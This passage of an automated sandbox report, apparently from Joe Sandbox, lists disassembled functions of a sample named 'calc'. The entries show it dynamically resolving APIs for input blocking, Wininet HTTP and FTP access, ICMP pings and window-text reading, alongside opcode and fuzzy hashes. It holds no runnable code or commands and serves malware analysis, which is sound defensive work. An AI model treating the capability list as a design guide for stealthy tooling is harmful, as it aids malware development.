    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: AddressLibraryLoadProc
    • String ID: BlockInput$user32.dll
    • API String ID: 2574300362-2937418566
    • Opcode ID: 404e9111c6e6801255c94cdd9c4d6e53c8d3ef9f70bd27f46ab3d7b24d408f0c
    • Instruction ID: 5cf9de07a1d2d069aa2e7b4fdd9df96ea71fdfaea9e6c567f07273b76baa48ce
    • Opcode Fuzzy Hash: 404e9111c6e6801255c94cdd9c4d6e53c8d3ef9f70bd27f46ab3d7b24d408f0c
    • Instruction Fuzzy Hash: 23D0C970640303EECB206F65D8897137AF8AB54703F60887BB499D1662D778D444CA2D
    Function 0040EE00 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON
    Download Yara Rule
    APIs
    • LoadLibraryA.KERNEL32(kernel32.dll,0040ED52), ref: 0040EE0B
    • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 0040EE1D
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: AddressLibraryLoadProc
    • String ID: GetNativeSystemInfo$kernel32.dll
    • API String ID: 2574300362-192647395
    • Opcode ID: 0b96ee1863518c42de66b1f26a690429182ced4a93e9530b1a523ccbf49fe990
    • Instruction ID: 4ae1193dba9c48cb0c5664eca05f475a23552d859b8bf3b4555ea32bba526360
    • Opcode Fuzzy Hash: 0b96ee1863518c42de66b1f26a690429182ced4a93e9530b1a523ccbf49fe990
    • Instruction Fuzzy Hash: 90D09270940706EFCB309F62C88971376A8AB04742F20886EA899A2292D77894448A58
    Function 0040EE27 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON
    Download Yara Rule
    APIs
    • LoadLibraryA.KERNEL32(kernel32.dll,0040EDDC,00000000,0040ED1A,00000000), ref: 0040EE32
    • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 0040EE44
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: AddressLibraryLoadProc
    • String ID: IsWow64Process$kernel32.dll
    • API String ID: 2574300362-3024904723
    • Opcode ID: 1e4c4c52eaf14ae59e37d506b1a8826225f3cb419422225db61ca319c80d633e
    • Instruction ID: 4d2749d2037bdd5891abe0ff91837f8b9674c2f4ff14754d6a40b5c982573c9e
    • Opcode Fuzzy Hash: 1e4c4c52eaf14ae59e37d506b1a8826225f3cb419422225db61ca319c80d633e
    • Instruction Fuzzy Hash: CFD0C9B0540706EECB219F62CC89B1376E8AB10703F248C7BF899E2291D778C444CB5C
    Function 0042FEC4 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON
    Download Yara Rule
    APIs
    • LoadLibraryA.KERNEL32(Wininet.dll,0042AD54,00000000,00000000), ref: 0042FECF
    • GetProcAddress.KERNEL32(00000000,InternetConnectW), ref: 0042FEE1
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: AddressLibraryLoadProc
    • String ID: InternetConnectW$Wininet.dll
    • API String ID: 2574300362-1624158369
    • Opcode ID: d55e37cb5c0b998d5704e0510165499c229194de1f36175613f9725cb941f9c2
    • Instruction ID: 6beab622e64ffd3ffafc19c2bb0389d1e9587c3fa6564a3e8a594d243805a38b
    • Opcode Fuzzy Hash: d55e37cb5c0b998d5704e0510165499c229194de1f36175613f9725cb941f9c2
    • Instruction Fuzzy Hash: 9CD0C770641302EFC7509F61E849B2376F4BB50713F51887EB486D1161D778C444CA1E
    Function 0042FEEB Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON
    Download Yara Rule
    APIs
    • LoadLibraryA.KERNEL32(Wininet.dll,0042AF68), ref: 0042FEF6
    • GetProcAddress.KERNEL32(00000000,FtpGetFileSize), ref: 0042FF08
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: AddressLibraryLoadProc
    • String ID: FtpGetFileSize$Wininet.dll
    • API String ID: 2574300362-2899565566
    • Opcode ID: bf1f0fae169dbb848176434d40dda45f633b0226ec4bdb1ab3f46c69e1570896
    • Instruction ID: 6e2f1a3589dd496c4a574bc58a45a2a8ffee36e7460e454037f1e55863833db7
    • Opcode Fuzzy Hash: bf1f0fae169dbb848176434d40dda45f633b0226ec4bdb1ab3f46c69e1570896
    • Instruction Fuzzy Hash: 00D0C970641312EEEB204F61EC897137AF8AB51702F60887BB485D2261E778D444CA1E
    Function 0042FE9D Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON
    Download Yara Rule
    APIs
    • LoadLibraryA.KERNEL32(Wininet.dll,0042A74E), ref: 0042FEA8
    • GetProcAddress.KERNEL32(00000000,InternetOpenW), ref: 0042FEBA
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: AddressLibraryLoadProc
    • String ID: InternetOpenW$Wininet.dll
    • API String ID: 2574300362-877548236
    • Opcode ID: 34b87f62cfdf380b8ccbfa36128968db94369e509c6d5735b559491f206b4e66
    • Instruction ID: 0d5205680ce1cf61959fbead00ef169317bcd9810b75d67f5dafcbe366c6e18d
    • Opcode Fuzzy Hash: 34b87f62cfdf380b8ccbfa36128968db94369e509c6d5735b559491f206b4e66
    • Instruction Fuzzy Hash: 3FD0C970641302EECB218F65E849B137AF8AF40707F6088BBB486D1261F778D944CA2E
    Function 0042FF60 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON
    Download Yara Rule
    APIs
    • LoadLibraryA.KERNEL32(ICMP.DLL,0042EE02,00000000), ref: 0042FF6B
    • GetProcAddress.KERNEL32(00000000,IcmpCreateFile), ref: 0042FF7D
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: AddressLibraryLoadProc
    • String ID: ICMP.DLL$IcmpCreateFile
    • API String ID: 2574300362-275556492
    • Opcode ID: 448ed7840704bb0c97f5a272b10aeb282cfbf60d1182337d8a215b2e0715e45b
    • Instruction ID: bf7179da54abc46cd951648f6e6908f67397438e0fda1f0a3b4423561e902304
    • Opcode Fuzzy Hash: 448ed7840704bb0c97f5a272b10aeb282cfbf60d1182337d8a215b2e0715e45b
    • Instruction Fuzzy Hash: E6D0C970B84302EADB208F61D94971376E8AB04742FA0887BF486D1250EB78D844CE1D
    Function 0042FF12 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON
    Download Yara Rule
    APIs
    • LoadLibraryA.KERNEL32(Wininet.dll,0042B04C,?,00000000), ref: 0042FF1D
    • GetProcAddress.KERNEL32(00000000,InternetCrackUrlW), ref: 0042FF2F
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: AddressLibraryLoadProc
    • String ID: InternetCrackUrlW$Wininet.dll
    • API String ID: 2574300362-347599637
    • Opcode ID: e9d49308bcfc6781801864efc9e89498d0e92c33abf54bec09941dec22f01ff2
    • Instruction ID: 5ff5592ba0a425792e03ce43277024437636c0b2cb541ece127d41c82a77f44a
    • Opcode Fuzzy Hash: e9d49308bcfc6781801864efc9e89498d0e92c33abf54bec09941dec22f01ff2
    • Instruction Fuzzy Hash: 30D0C770651302EECB104F71D849B13B6F46B61703F50887BB445D1191E77CD454CB1E
    Function 0042FF39 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON
    Download Yara Rule
    APIs
    • LoadLibraryA.KERNEL32(kernel32.dll,0042E1E0), ref: 0042FF44
    • GetProcAddress.KERNEL32(00000000,GlobalMemoryStatusEx), ref: 0042FF56
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: AddressLibraryLoadProc
    • String ID: GlobalMemoryStatusEx$kernel32.dll
    • API String ID: 2574300362-2840702992
    • Opcode ID: 94cea872562736caa615b9a265b0d0f8118fda40b181ffbbb9525ecd0ba62313
    • Instruction ID: 8a938186144a47b9956747278f1c4d40b4f4c98024efec04d135bd045ace993e
    • Opcode Fuzzy Hash: 94cea872562736caa615b9a265b0d0f8118fda40b181ffbbb9525ecd0ba62313
    • Instruction Fuzzy Hash: 95D0C770644702DEC7105F61D94971377E4AB41742F51887BF45AD13A6D778D448C71D
    Function 0042FFD5 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON
    Download Yara Rule
    APIs
    • LoadLibraryA.KERNEL32(Wininet.dll,0042FCCB,00479E08,0042A8BD,0047A12C,00479E08,00000000,00000000,00479E08,00479BD8), ref: 0042FFE0
    • GetProcAddress.KERNEL32(00000000,InternetCloseHandle), ref: 0042FFF2
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: AddressLibraryLoadProc
    • String ID: InternetCloseHandle$Wininet.dll
    • API String ID: 2574300362-2671934185
    • Opcode ID: da7a4e695b75a524f41592d6218b4e95730e5d58a7a56d9fa048062187c07d0c
    • Instruction ID: 5f85477641528b649044d5b180d8833ed898c78725f852d861f6adab056468e1
    • Opcode Fuzzy Hash: da7a4e695b75a524f41592d6218b4e95730e5d58a7a56d9fa048062187c07d0c
    • Instruction Fuzzy Hash: 9BD0C970645303EEDB204F61D8497137AF8AB51706F608D7BB585D12A0EBB8C854CA1E
    Function 0042FFFC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON
    Download Yara Rule
    APIs
    • LoadLibraryA.KERNEL32(Wininet.dll,0042FD4A,00000003,0042ABAC,?,00000000,00000000,00000000,?,00000000,00000002,00000000,00000002,?,?,?), ref: 00430007
    • GetProcAddress.KERNEL32(00000000,InternetOpenUrlW), ref: 00430019
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: AddressLibraryLoadProc
    • String ID: InternetOpenUrlW$Wininet.dll
    • API String ID: 2574300362-1201172734
    • Opcode ID: 141d25df4eb92c3a49c7ef6aa85ce327791cac5de94b58be8ec3f37f1331c0b2
    • Instruction ID: 5a4cbaa502e8c8f1ab29dba965d814a9a2628aecf7a0e04567c8e0bf69dd12b8
    • Opcode Fuzzy Hash: 141d25df4eb92c3a49c7ef6aa85ce327791cac5de94b58be8ec3f37f1331c0b2
    • Instruction Fuzzy Hash: 5DD0C970641306FECB209FA1D8597137AFCAB48702F20D96EB486D1262E778D840CE1E
    Function 0042FF87 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON
    Download Yara Rule
    APIs
    • LoadLibraryA.KERNEL32(ICMP.DLL,0042EE92,00000000,00000000,00000101,?,00000000), ref: 0042FF92
    • GetProcAddress.KERNEL32(00000000,IcmpCloseHandle), ref: 0042FFA4
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: AddressLibraryLoadProc
    • String ID: ICMP.DLL$IcmpCloseHandle
    • API String ID: 2574300362-3530519716
    • Opcode ID: 0028ad27e4753e6a7c9841a6e405e2d916431237add922c083a50b67822741ce
    • Instruction ID: 4ad17662a18769c5ca722e306ae6d49d0565d4f0a8ec4b6744b8708eb146cff8
    • Opcode Fuzzy Hash: 0028ad27e4753e6a7c9841a6e405e2d916431237add922c083a50b67822741ce
    • Instruction Fuzzy Hash: 70D0C970644302EFDB208F61D949B1B76E8AB00702F608C7BF487D2254EB78D494DA1D
    Function 0042FFAE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON
    Download Yara Rule
    APIs
    • LoadLibraryA.KERNEL32(ICMP.DLL,0042EE9F,00000000,00000000,00000101,?,00000000), ref: 0042FFB9
    • GetProcAddress.KERNEL32(00000000,IcmpSendEcho), ref: 0042FFCB
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: AddressLibraryLoadProc
    • String ID: ICMP.DLL$IcmpSendEcho
    • API String ID: 2574300362-58917771
    • Opcode ID: 5c744039cc312e32fa68ca1fd5a98d9c5030e6167d7fc7856f0a5a5cb21ae833
    • Instruction ID: 2527bdccc761a368fe9d4b677af4fa62b435770a335d842e50a769aa11b7ee6a
    • Opcode Fuzzy Hash: 5c744039cc312e32fa68ca1fd5a98d9c5030e6167d7fc7856f0a5a5cb21ae833
    • Instruction Fuzzy Hash: 2BD0C970644302EADB208F61DA4971376E8AB00706F61887BF486D1A90EB78D444CB1D
    Function 0040BF99 Relevance: 6.2, APIs: 4, Instructions: 150windowCOMMON
    Download Yara Rule
    APIs
    • SendMessageW.USER32(?,000000B0,?,?), ref: 0040C0D8
    • 73A245F0.USER32(?,000000EC), ref: 0040C109
    • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0040C121
      • Part of subcall function 0040B6AE: ShowWindow.USER32(00000003,00000000), ref: 0040B705
      • Part of subcall function 0040B6AE: EnableWindow.USER32(00000000,00000000), ref: 0040B719
      • Part of subcall function 0040B6AE: ShowWindow.USER32(00000003,00000000), ref: 0040B766
      • Part of subcall function 0040B6AE: ShowWindow.USER32(00000000,00000004), ref: 0040B76E
      • Part of subcall function 0040B6AE: EnableWindow.USER32(00000000,00000001), ref: 0040B782
      • Part of subcall function 0040B6AE: SendMessageW.USER32(?,0000130C,?,00000000), ref: 0040B7A6
    • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0040C163
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: Window$MessageSend$Show$Enable$A245
    • String ID:
    • API String ID: 2927547150-0
    • Opcode ID: e0b8e8a8c1225e95f7b846a9a48211d2fc1fff89641d0f1ca204f0f826a7819d
    • Instruction ID: 1ec3ef74c3e398beafbea589559c1554702fd897ea59bcf825dcf1c94443ef63
    • Opcode Fuzzy Hash: e0b8e8a8c1225e95f7b846a9a48211d2fc1fff89641d0f1ca204f0f826a7819d
    • Instruction Fuzzy Hash: 3C519F74500248EFDB218F64C8C4BEB7BA4AF09314F10066AF5656B2E2C739AD95CF98
    Function 00403AB0 Relevance: 6.1, APIs: 4, Instructions: 148COMMON
    Download Yara Rule
    APIs
    • GetClassNameW.USER32(00000000,?,00000400), ref: 00403AE7
    • GetWindowTextW.USER32(00000000,?,00000400), ref: 00403B25
    • CharUpperBuffW.USER32(?,00000000), ref: 00403B42
    • GetWindowTextW.USER32(00000000,?,00000400), ref: 00403BB0
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: TextWindow$BuffCharClassNameUpper
    • String ID:
    • API String ID: 4150757866-0
    • Opcode ID: 13869d2845ef0ca8cb8f055bbeec585a43cf271bc599697833620ad504bd845e
    • Instruction ID: 0584a30db60857092b00d2278fbf8332574566965ff49f28b8e04b70d15a5c85
    • Opcode Fuzzy Hash: 13869d2845ef0ca8cb8f055bbeec585a43cf271bc599697833620ad504bd845e
    • Instruction Fuzzy Hash: 19512172804549BEDB11DF50C945AEABBBCFF0431AF1480A7D405B2582DB38AF96CB94
    Function 004080B0 Relevance: 6.1, APIs: 4, Instructions: 119COMMON
    Download Yara Rule
    APIs
    • GetWindowRect.USER32(?,?), ref: 0040811D
    • InvalidateRect.USER32(?,00000000,00000000,?,?,?), ref: 00408185
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: Rect$InvalidateWindow
    • String ID:
    • API String ID: 2377233956-0
    • Opcode ID: fea54292c0e1d2534fd66d1e25aac67a1e4b5e63873669762bc16cc831050328
    • Instruction ID: 74dc3bcb53b80da343a71e2514c747408086c0bef610d4d3420c968f332f9c05
    • Opcode Fuzzy Hash: fea54292c0e1d2534fd66d1e25aac67a1e4b5e63873669762bc16cc831050328
    • Instruction Fuzzy Hash: DD416D71900609EFCB15DF64C981AAEB7B1FF44310F10416EEA62BB2D1DB74AD61CB58
    Function 004309C0 Relevance: 6.1, APIs: 4, Instructions: 114COMMON
    Download Yara Rule
    APIs
    • GetLastError.KERNEL32(?,00000000,?,00431DC7,?,00000001,NULL Pointer assignment,00000001,?,0045C6D0,?), ref: 00430A01
    • VariantCopy.OLEAUT32(-00000068,?), ref: 00430A57
    • VariantCopy.OLEAUT32(-00000058,00000008), ref: 00430A6C
    • VariantCopy.OLEAUT32(-00000078,00000008), ref: 00430A81
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: CopyVariant$ErrorLast
    • String ID:
    • API String ID: 2286883814-0
    • Opcode ID: 5af0195bfadb05a0c3b1fb0af8056b65b133b5ffb26115bf59ef324aa679a039
    • Instruction ID: 74ec36ade127758d2b5d6a60e7b2c92c59a7636115ccca8a5f9d65f218e57e45
    • Opcode Fuzzy Hash: 5af0195bfadb05a0c3b1fb0af8056b65b133b5ffb26115bf59ef324aa679a039
    • Instruction Fuzzy Hash: 85416D71900209DFCB00DF69D954A9BB7F8FF48304F1445AAE809E7362EB78AD45CB99
